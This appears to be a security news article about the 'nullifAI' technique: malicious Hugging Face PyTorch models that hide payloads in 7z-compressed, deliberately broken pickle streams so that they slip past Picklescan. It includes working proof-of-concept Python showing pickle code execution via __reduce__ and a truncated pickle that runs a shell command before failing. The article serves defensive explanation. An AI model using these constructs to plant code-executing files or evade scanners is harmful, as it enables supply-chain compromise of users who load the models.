Cybersecurity researchers have discovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
"The pickle files extracted from the mentioned PyTorch archives contained malicious Python content at the beginning of the file," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "In both instances, the malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address."
The approach has been dubbed nullifAI, as it involves clear-cut attempts to sidestep existing safeguards put in place to identify malicious models. The Hugging Face repositories in question are listed below –
- glockr1/ballr7
- who-r-u0000/00000000000000000000000000
The models are believed to be more of a proof-of-concept (PoC) than an active supply chain attack scenario.
The pickle serialization format, used commonly for distributing ML models, has repeatedly been found to be a security risk, as it offers ways to execute arbitrary code as soon as a file is loaded and deserialized.
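To illustrate why loading a pickle file is equivalent to running code, here is a minimal, self-contained Python sketch. The `Malicious` class and the harmless `true` command are illustrative stand-ins for a real payload such as the reverse shell described above:

```python
import os
import pickle


class Malicious:
    """Any callable returned by __reduce__ is invoked during unpickling."""

    def __reduce__(self):
        # pickle will call os.system("true") at load time; a real attack
        # would spawn a reverse shell here instead of a harmless command.
        return (os.system, ("true",))


payload = pickle.dumps(Malicious())

# Simply loading the bytes executes the command before any object is
# handed back to the caller.
result = pickle.loads(payload)
```

This is why `pickle.loads` should never be called on untrusted data, and why model hubs scan pickle-based artifacts before serving them.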
Both models detected by the cybersecurity company are stored in the PyTorch format, which is essentially a compressed pickle file. While PyTorch uses the ZIP format for compression by default, the identified models were compressed using the 7z format.
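The difference between the two container formats is visible in a file's magic bytes. The following sketch (the `archive_kind` helper is hypothetical and not part of any real scanner) triages a model file by inspecting its first few bytes:

```python
ZIP_MAGIC = b"PK\x03\x04"                # standard torch.save() archives
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"     # 7z archives, as in the malicious models


def archive_kind(path):
    """Return 'zip', '7z', or 'unknown' based on the file's magic bytes."""
    with open(path, "rb") as f:
        head = f.read(6)
    if head.startswith(ZIP_MAGIC):
        return "zip"
    if head.startswith(SEVENZ_MAGIC):
        return "7z"
    return "unknown"
```

A scanner that assumes every PyTorch checkpoint is a ZIP archive would classify a 7z-compressed model as "unknown" and potentially skip deeper inspection.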
Consequently, this behavior made it possible for the models to fly under the radar and avoid being flagged as malicious by Picklescan, a tool used by Hugging Face to detect suspicious pickle files.
"An interesting thing about this pickle file is that the object serialization (the purpose of the pickle file) breaks shortly after the malicious payload is executed, resulting in the failure of the object's decompilation," Zanki said.
Further analysis has revealed that such broken pickle files can still be partially deserialized owing to a discrepancy between Picklescan and how deserialization actually works, causing the malicious code to be executed even though the tool throws an error message. The open-source utility has since been updated to rectify this bug.
"The explanation for this behavior is that object deserialization is performed on pickle files sequentially," Zanki said.
"Pickle opcodes are executed as they are encountered, until either all opcodes are executed or a broken instruction is hit. In the case of the discovered models, the malicious payload is inserted at the beginning of the pickle stream, so it executes before the stream breaks and before it can be flagged by existing security scanning tools."
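The sequential-execution behavior Zanki describes can be reproduced with a few lines of Python. Below is a hedged sketch of a hand-assembled, deliberately truncated protocol-0 pickle stream, using a harmless `touch` command as a stand-in for a real payload. The stream omits the terminating STOP opcode (`.`), so it is "broken", yet the payload still runs before deserialization fails:

```python
import os
import pickle

# Hand-crafted pickle stream (protocol 0). The opcodes that call
# os.system("touch pickle_poc_marker") come first; the mandatory STOP
# opcode ('.') that normally terminates a pickle is deliberately omitted,
# leaving the stream broken, but only after the payload has already run.
broken = b"cos\nsystem\n(S'touch pickle_poc_marker'\ntR"

try:
    pickle.loads(broken)          # payload executes during deserialization
except Exception as exc:          # then the truncated stream raises an error
    print("load failed:", exc)

# The side effect proves the payload ran despite the error.
payload_ran = os.path.exists("pickle_poc_marker")
if payload_ran:
    os.remove("pickle_poc_marker")
```

A scanner that treats any deserialization error as "file is invalid, therefore safe" misses exactly this case, which is the mismatch the Picklescan update addressed.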